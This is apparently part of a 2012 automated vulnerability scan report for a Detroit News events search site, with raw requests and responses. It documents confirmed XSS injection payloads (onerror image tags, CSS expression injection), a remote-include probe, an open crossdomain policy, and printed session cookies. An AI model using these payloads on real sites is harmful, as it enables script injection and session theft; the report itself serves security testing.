<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>

<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>

<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>

!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script&gt;
<!-- End OAS Ad Code -->

<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>

</head>

<body class="ody-skin">

<div class="ody-custom interactive">
<div class="ody-custom-wrapper">

<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>

<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">

<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="family" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="3" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Port Huron Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City &amp; State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.451530329483086" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&amp;lid=Header_NavBar_'&gt;&lt;iMg src=N onerror=netsparker(9)&gt;&amp;lpos='&gt;&lt;iMg src=N onerror=netsparker(9)&gt;_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&amp;lid=Header_NavBar_'&gt;&lt;iMg src=N onerror=netsparker(9)&gt;&amp;lpos='&gt;&lt;iMg src=N onerror=netsparker(9)&gt;_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&amp;lid=Header_NavBar_'&gt;&lt;iMg src=N onerror=netsparker(9)&gt;&amp;lpos='&gt;&lt;iMg src=N onerror=netsparker(9)&gt;_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&amp;lid=Header_NavBar_'&gt;&lt;iMg src=N onerror=netsparker(9)&gt;&amp;lpos='&gt;&lt;iMg src=N onerror=netsparker(9)&gt;_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Facat%3D3%26cat%3D3%26new%3Dn%26search%3Dtrue%26srad%3D40%26srss%3D50%26ssi%3D0%26ssrss%3D5%26st%3D%27%253E%253CiMg%2520src%3DN%2520onerror%3Dnetsparker%289%29%253E%26svt%3Dtext%26swhat%3Dfamily%26swhen%3D3%26trim%3D1%26sort%3D1">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Facat%3D3%26cat%3D3%26new%3Dn%26search%3Dtrue%26srad%3D40%26srss%3D50%26ssi%3D0%26ssrss%3D5%26st%3D%27%253E%253CiMg%2520src%3DN%2520onerror%3Dnetsparker%289%29%253E%26svt%3Dtext%26swhat%3Dfamily%26swhen%3D3%26trim%3D1%26sort%3D1">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st='><iMg src=N onerror=netsparker(9)>&what=family&when=3&ssi=0&ssrss=5&srss=51&cat=3');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: '><iMg src=N onerror=netsparker(9)> is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?acat=3&cat=3&new=n&search=true&sort=1&srss=50&ssrss=5&st=%27%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&svt=text&swhat=family&swhen=3&swhere=&trim=1' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?acat=3&cat=3&new=n&search=true&sort=1&srss=50&ssrss=5&st=%27%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&svt=text&swhat=family&swhen=3&swhere=&trim=1' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span>family</span>" in our '&amp;gt;&amp;lt;iMg src=N onerror=netsparker(9)&amp;gt; search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what y..
- /search

/search CONFIRMED

http://events.detnews.com/search?cat=1&st=/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
cat GET 1
st GET /" stYle="x:expre/**/ssion(alert(9))

Request

GET /search?cat=1&st=/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiDmxhc3Rfd2hhdCIsLycgc3RZbGU9J3ggZXhwcmUvICAvc3Npb24gbmV0c3BhcmtlciA5IghyaWRpACIJc2VpZGkIIgtidWNrZXRGIg5sYXN0X3doZW4iBjMiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESILcmFkaXVzaS0iCWNpdHkiGFBvcnQgSHVyb24gVG93bnNoaXAiCmVycm9yRiINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdNSQ%3D%3D--820c7d21b97737320ea5b5be615e748addb268de; welcome=bfi54I2inY-9f2MM19CNcg.130339426; zvents_tracker_sid=bfi54I2inY-9f2MM19CNcg.130339426
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:17:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 122
ETag: "a2c2af705c01ece6f0efa1d8d99be133"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www6
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiCXNlaWRpCSIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbGFzdF9yc3MiBzUwIg1sb2NhdGlvbnsRIgljaXR5IhhQb3J0IEh1cm9uIFRvd25zaGlwIgtyYWRpdXNpLSINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhRBbWVyaWNhL0RldHJvaXQiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODIuNDg2MTA1MzAwMDAwMDA2AHpjIhF3aGVyZV9zdHJpbmdAHSIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIKc3RhdGUiB01J--0186cf190c1ec2c737ab4af8c71f0d8646f04369; path=/; expires=Sat, 14-Apr-2012 14:17:11 GMT; HttpOnly
Content-Encoding:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Arts &amp;amp; Crafts - Detroit News</title> <script type="text/javascript"> var zlogid = "qh61jPtYSb6RkN6ig5HDdw"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '/\&quot; stYle=\&quot;x:expre/**/ssion(netsparker(9))'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_cat = '1';var z_st = '/\&quot; stYle=\&quot;x:expre/**/ssion(netsparker(9))';var z_swhat = '';var z_swhen = '';var z_swhere = '';var z_srad = '40';var z_action = 'index';var z_cobrand = '#&lt;Partner:0x2b88ea313410&gt;';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.153012922290923" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_/" stYle="x:expre/**/ssion(netsparker(9))"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"qh61jPtYSb6RkN6ig5HDdw","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="/\&quot; stYle=\&quot;x:expre/**/ssion(netsparker(9))"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="new"s_zv.prop1=""s_zv.prop10="Port Huron Township, MI"s_zv.prop2=""s_zv.prop3="" s_zv.pageName="/\&quot; stYle=\&quot;x:expre/**/ssion(netsparker(9)):searches:text" s_zv.channel="/\&quot; stYle=\&quot;x" s_zv.hier1="/\&quot; stYle=\&quot;x,expre/**/ssion(netsparker(9)),searches" s_zv.prop12="expre/**/ssion(netsparker(9)) searches" s_zv.prop25="/search?cat=1&amp;st=/%22%20stYle=%22x:expre/**/ssion(netsparker(9))" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|/\&quot; stYle=\&quot;x:expre/**/ssion(netsparker(9)):searches:text" s_zv.server="www6.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&amp;lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">

<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>

<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>

<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>

<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>

!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script&gt;
<!-- End OAS Ad Code -->

<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>

</head>

<body class="ody-skin">

<div class="ody-custom interactive">
<div class="ody-custom-wrapper">

<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>

<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">

<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Port Huron Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City &amp; State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.153012922290923" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&amp;lid=Header_NavBar_/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))&amp;lpos=/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&amp;lid=Header_NavBar_/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))&amp;lpos=/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&amp;lid=Header_NavBar_/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))&amp;lpos=/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&amp;lid=Header_NavBar_/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))&amp;lpos=/&quot; stYle=&quot;x:expre/**/ssion(netsparker(9))_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fcat%3D1%26st%3D%2F%2522%2520stYle%3D%2522x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fcat%3D1%26st%3D%2F%2522%2520stYle%3D%2522x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st=/" stYle="x:expre/**/ssion(netsparker(9))&ssi=0&ssrss=5&srss=11&cat=1');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: /" stYle="x:expre/**/ssion(netsparker(9)) is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?cat=1&st=%2F%22+stYle%3D%22x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?cat=1&st=%2F%22+stYle%3D%22x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span></span>" in our /&amp;quot; stYle=&amp;quot;x:expre/**/ssion(netsparker(9)) search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what you enjoy. </p><h3 class="sub_heading">Expand Your Search</h3><a href="/search?cat=1&amp;new=n&amp;srad=40&amp;st=any&amp;swhat=&amp;swhen=&amp;swhere=">Search for "" in all products</a><div class="products">(Events, Movies, Venues, Restaurants, and Performers)</div><h3 class="sub_heading">Search Tips</h3><p>To learn how to get better results from your searches, read our <a href='/welcome/search_tips'>Search Tips</a>.</p><h3 class="sub_heading">Subscribe To This Search</h3><p>New listings are created all the time, which means that there's a good chance that there will be matches for this search in the futur..
Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

Classification

OWASP A6 PCI v2.0-6.5.9 CWE-16 WASC-15
- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://events.detnews.com/crossdomain.xml

Policy Rules

  • <allow-access-from domain="*" />

Request

GET /crossdomain.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexEiCWNpdHkiH1JveWFsIE9hayBDaGFydGVyIFRvd25zaGlwIgtyYWRpdXNpUCINbGF0aXR1ZGVmGjQyLjQ5MjI5NDYwMDAwMDAwMQB%2FqyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciI1JveWFsIE9hayBDaGFydGVyIFRvd25zaGlwLCBNSSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODMuMTMyNzMzMjAwMDAwMDA0AEX7IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIKNDgwNjciCnN0YXRlIgdNSQ%3D%3D--5909e1b9db34e112c181afa413cb1e0a0f4fc510; welcome=e6WjvB-0eLxOLXKsdXGTEw.130338079; zvents_tracker_sid=e6WjvB-0eLxOLXKsdXGTEw.130338079
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:37 GMT
Content-Type: text/xml
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sun, 15 Jan 2012 13:51:37 GMT
Cache-Control: max-age=86400
Content-Encoding:


<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /search

/search CONFIRMED

http://events.detnews.com/search?has_editors_pick=1&new=n&srad=40&swhat=3&swhen=http://netsparker.co..

Parameters

Parameter Type Value
has_editors_pick GET 1
new GET n
srad GET 40
swhat GET 3
swhen GET http://netsparker.com/n? .php

Request

GET /search?has_editors_pick=1&new=n&srad=40&swhat=3&swhen=http://netsparker.com/n?%00.php HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciCHJpZGkYIg5sYXN0X3doYXQiECcgT1IgJzEnPScxIg5sYXN0X3doZW4iEE5leHQgNyBEYXlzIgtidWNrZXRGIg1sYXN0X3JzcyIHNTAiDWxvY2F0aW9uexEiC3JhZGl1c2lQIgljaXR5Ih9Sb3lhbCBPYWsgQ2hhcnRlciBUb3duc2hpcCIKZXJyb3JGIg1sYXRpdHVkZWYaNDIuNDkyMjk0NjAwMDAwMDAxAH%2BrIhNkaXNwbGF5X3N0cmluZyIjUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAsIE1JIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODMuMTMyNzMzMjAwMDAwMDA0AEX7IgxhZGRyZXNzIgo0ODA2NyIRd2hlcmVfc3RyaW5nQBgiCnN0YXRlIgdNSQ%3D%3D--08e9e0b2dc71467006713c0dad0bddfa9f5ced06; welcome=vzxC8TsWPUPsWdkcgntN-Q.130338090; zvents_tracker_sid=vzxC8TsWPUPsWdkcgntN-Q.130338090
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:52:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 500 Internal Server Error
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www21
Cache-Control: no-cache, private
